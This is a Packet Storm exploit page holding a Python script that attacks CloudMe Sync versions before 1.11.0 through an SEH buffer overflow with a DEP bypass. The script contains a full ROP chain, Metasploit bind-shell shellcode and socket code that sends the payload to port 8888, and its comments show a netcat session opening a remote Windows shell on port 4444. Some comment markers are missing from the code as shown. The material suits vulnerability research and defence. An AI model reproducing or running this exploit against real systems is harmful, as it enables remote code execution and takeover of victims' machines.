exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CloudMe Sync SEH Buffer Overflow

CloudMe Sync SEH Buffer Overflow
Posted May 28, 2018
Authored by Juan Prescotto

CloudMe Sync versions prior to 1.11.0 SEH buffer overflow exploit with DEP bypass.

tags | exploit, overflow
SHA-256 | f0e35b18cc3b45a2f7245397a9807fa2574cce43e052d6507bbce428f8230e1f

CloudMe Sync SEH Buffer Overflow

Change Mirror Download
# Exploit: CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)  
# Date: 2018-05-27
# Author: Juan Prescotto
# Tested Against: Win7 Pro SP1 64 bit
# Software Download: https://www.cloudme.com/downloads/CloudMe_1109.exe
# Tested Against Version: 1.10.9
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine
# Credit: Thanks to John Page (aka hyp3rlinx) (https://www.exploit-db.com/exploits/44027/)
# for his work on the original exploit

# Bad Characers: \x00
# SEH Offset: 2236
# Non-Participating Modules Used: Qt5Gui.dll, Qt5Core.dll,libstdc++-6.dll, libgcc_s_dw2-1.dll, libwinpthread-1.dll

# Victim Machine:
# C:\>netstat -nao | find "8888"
# TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 2640
# C:\>tasklist | find "2640"
# CloudMe.exe 2640 Console 1 36,632 K

# Attacking Machine:
# root@kali:~/Desktop# python cloudme.py
# CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass
# [+] CloudMe Target IP> 192.168.12.4
# Sending buffer overflow to CloudMe Service
# Target Should be Running a Bind Shell on Port 4444!

# root@kali:~/Desktop# nc -nv 192.168.12.4 4444
# (UNKNOWN) [192.168.12.4] 4444 (?) open
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.

# C:\Users\jprescotto\AppData\Local\Programs\CloudMe\CloudMe>
# My register setup when VirtualProtect() is called (Defeat DEP) :
--
# EAX = NOP (0x90909090)
# ECX = lpOldProtect (ptr to W address)
# EDX = NewProtect (0x40)
# EBX = dwSize
# ESP = lPAddress (automatic)
# EBP = ReturnTo (ptr to jmp esp)
# ESI = ptr to VirtualProtect()
# EDI = ROP NOP (RETN)

#!/usr/bin/python

import socket,struct

print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass'

def create_rop_chain():

rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x61d1e7fe, POP ECX RETN [Qt5Gui.dll]
0x690398a8, ptr to &VirtualProtect() [IAT Qt5Core.dll]
0x6fe70610, MOV EAX,DWORD PTR DS:[ECX] RETN [libstdc++-6.dll]
0x61c40a6f, XCHG EAX,ESI RETN [Qt5Gui.dll]
0x68c8ea5a, POP EBP RETN [Qt5Core.dll]
0x68d652e1, & call esp [Qt5Core.dll]
0x68fa7ca2, POP EDX RETN [Qt5Core.dll]
0xfffffdff, Value to negate, will become 0x00000201
0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll]
0x68d52747, POP EBX RETN [Qt5Core.dll]
0xffffffff,
0x68f948bc, INC EBX RETN [Qt5Core.dll]
0x68f8063c, ADD EBX,EDX ADD AL,0A RETN [Qt5Core.dll]
0x68f9a472, POP EDX RETN [Qt5Core.dll]
0xffffffc0, Value to negate, will become 0x00000040
0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll]
0x61f057ab, POP ECX RETN [Qt5Gui.dll]
0x6eb5efa3, &Writable location [libgcc_s_dw2-1.dll]
0x61dc14d1, POP EDI RETN [Qt5Gui.dll]
0x64b4ed0c, RETN (ROP NOP) [libwinpthread-1.dll]
0x61ba6245, POP EAX RETN [Qt5Gui.dll]
0x90909090, nop
0x61b45ea3, PUSHAD RETN [Qt5Gui.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()



#msf payload(shell_bind_tcp) > show options
#Module options (payload/windows/shell_bind_tcp):
# Name Current Setting Required Description
# EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
# LPORT 4444 yes The listen port
# RHOST no The target address
#msf payload(shell_bind_tcp) > generate -b '\x00' -t py
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai

shellcode = ""
shellcode += "\xda\xcf\xba\x8c\x90\x7b\x70\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\xda\x83\x99"
shellcode += "\x85\x1e\x4b\xdf\x66\xde\x8c\x80\xef\x3b\xbd\x80\x94"
shellcode += "\x48\xee\x30\xde\x1c\x03\xba\xb2\xb4\x90\xce\x1a\xbb"
shellcode += "\x11\x64\x7d\xf2\xa2\xd5\xbd\x95\x20\x24\x92\x75\x18"
shellcode += "\xe7\xe7\x74\x5d\x1a\x05\x24\x36\x50\xb8\xd8\x33\x2c"
shellcode += "\x01\x53\x0f\xa0\x01\x80\xd8\xc3\x20\x17\x52\x9a\xe2"
shellcode += "\x96\xb7\x96\xaa\x80\xd4\x93\x65\x3b\x2e\x6f\x74\xed"
shellcode += "\x7e\x90\xdb\xd0\x4e\x63\x25\x15\x68\x9c\x50\x6f\x8a"
shellcode += "\x21\x63\xb4\xf0\xfd\xe6\x2e\x52\x75\x50\x8a\x62\x5a"
shellcode += "\x07\x59\x68\x17\x43\x05\x6d\xa6\x80\x3e\x89\x23\x27"
shellcode += "\x90\x1b\x77\x0c\x34\x47\x23\x2d\x6d\x2d\x82\x52\x6d"
shellcode += "\x8e\x7b\xf7\xe6\x23\x6f\x8a\xa5\x2b\x5c\xa7\x55\xac"
shellcode += "\xca\xb0\x26\x9e\x55\x6b\xa0\x92\x1e\xb5\x37\xd4\x34"
shellcode += "\x01\xa7\x2b\xb7\x72\xee\xef\xe3\x22\x98\xc6\x8b\xa8"
shellcode += "\x58\xe6\x59\x44\x50\x41\x32\x7b\x9d\x31\xe2\x3b\x0d"
shellcode += "\xda\xe8\xb3\x72\xfa\x12\x1e\x1b\x93\xee\xa1\x32\x38"
shellcode += "\x66\x47\x5e\xd0\x2e\xdf\xf6\x12\x15\xe8\x61\x6c\x7f"
shellcode += "\x40\x05\x25\x69\x57\x2a\xb6\xbf\xff\xbc\x3d\xac\x3b"
shellcode += "\xdd\x41\xf9\x6b\x8a\xd6\x77\xfa\xf9\x47\x87\xd7\x69"
shellcode += "\xeb\x1a\xbc\x69\x62\x07\x6b\x3e\x23\xf9\x62\xaa\xd9"
shellcode += "\xa0\xdc\xc8\x23\x34\x26\x48\xf8\x85\xa9\x51\x8d\xb2"
shellcode += "\x8d\x41\x4b\x3a\x8a\x35\x03\x6d\x44\xe3\xe5\xc7\x26"
shellcode += "\x5d\xbc\xb4\xe0\x09\x39\xf7\x32\x4f\x46\xd2\xc4\xaf"
shellcode += "\xf7\x8b\x90\xd0\x38\x5c\x15\xa9\x24\xfc\xda\x60\xed"
shellcode += "\x1c\x39\xa0\x18\xb5\xe4\x21\xa1\xd8\x16\x9c\xe6\xe4"
shellcode += "\x94\x14\x97\x12\x84\x5d\x92\x5f\x02\x8e\xee\xf0\xe7"
shellcode += "\xb0\x5d\xf0\x2d"

ip=raw_input('[+] CloudMe Target IP> ')

stack_pivot=struct.pack('<L',0x61d95f58) {pivot 3492 / 0xda4} (Lands us into rop nop chain --> rop_chain) : SUB ESP,8 ADD ESP,0D8C POP EBX POP ESI POP EDI POP EBP RETN 0x08 ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
rop_nop1=struct.pack('<L',0x68b1a714) * 300 RETN 0x10 ** [Qt5Core.dll] ** | {PAGE_EXECUTE_READ}
rop_nop2=struct.pack('<L',0x61c6fc53) * 50 RETN ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
nop = "\x90" * 20

payload = "A" * 2236 + stack_pivot + rop_nop1 + rop_nop2 + rop_chain + nop + shellcode + "B"*(5600-len(rop_nop1)-len(rop_nop2)-len(rop_chain)-len(nop)-len(shellcode))


s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,8888))
s.send(payload)
print 'Sending buffer overflow to CloudMe Service'
print 'Target Should be Running a Bind Shell on Port 4444!'

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close